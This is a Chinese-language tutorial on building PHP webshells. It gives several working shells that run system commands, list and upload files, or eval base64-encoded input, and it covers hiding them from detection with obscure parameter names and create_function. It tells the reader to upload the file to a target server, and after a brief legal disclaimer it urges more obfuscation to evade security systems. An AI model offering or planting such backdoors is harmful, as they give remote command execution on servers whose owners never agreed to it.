实现webshell php

创建基本的PHP webshell

以下是一个简单的PHP webshell代码示例，可以执行系统命令：

<?php
if(isset($_REQUEST['cmd'])) {
    $output = shell_exec($_REQUEST['cmd']);
    echo "<pre>$output</pre>";
}
?>

将上述代码保存为.php文件并上传到目标服务器，通过URL参数传递命令，例如：http://example.com/shell.php?cmd=ls

增强功能的webshell

更高级的webshell可能包含以下功能：

<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
if(isset($_POST['cmd'])) {
    echo "<pre>".shell_exec($_POST['cmd'])."</pre>";
}
?>

这个版本同时支持GET和POST请求方式，增加了使用灵活性。

密码保护的webshell

为webshell添加基本认证：

<?php
$pass = "secret";
if($_GET['pass'] != $pass) {
    die("Invalid password");
}

if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

使用时需要提供密码参数：http://example.com/shell.php?pass=secret&cmd=id

文件管理功能

实现简单的文件浏览和上传功能：

<?php
// 文件列表
if(isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $files = scandir($dir);
    foreach($files as $file) {
        echo $file."<br>";
    }
}

// 文件上传
if(isset($_FILES['file'])) {
    move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
}
?>

隐蔽性增强技术

使用更隐蔽的参数名和编码技术：

<?php
if(isset($_REQUEST['x'])) {
    eval(base64_decode($_REQUEST['x']));
}
?>

使用时需要将命令base64编码后传递，例如：echo "system('ls');" | base64

反检测技术

避免使用常见的关键词：

<?php
$f = "create_function";
$c = $f('', $_GET['x']);
$c();
?>

这种技术使用PHP的create_function来动态创建函数执行代码。

注意事项

PHP webshell的使用可能违反法律和道德规范，仅限在授权的安全测试中使用。确保拥有合法权限后再进行任何测试操作。

现代安全防护系统会检测常见的webshell模式，实际应用中需要考虑更多混淆和绕过技术。保持webshell的更新以适应不同的防护机制。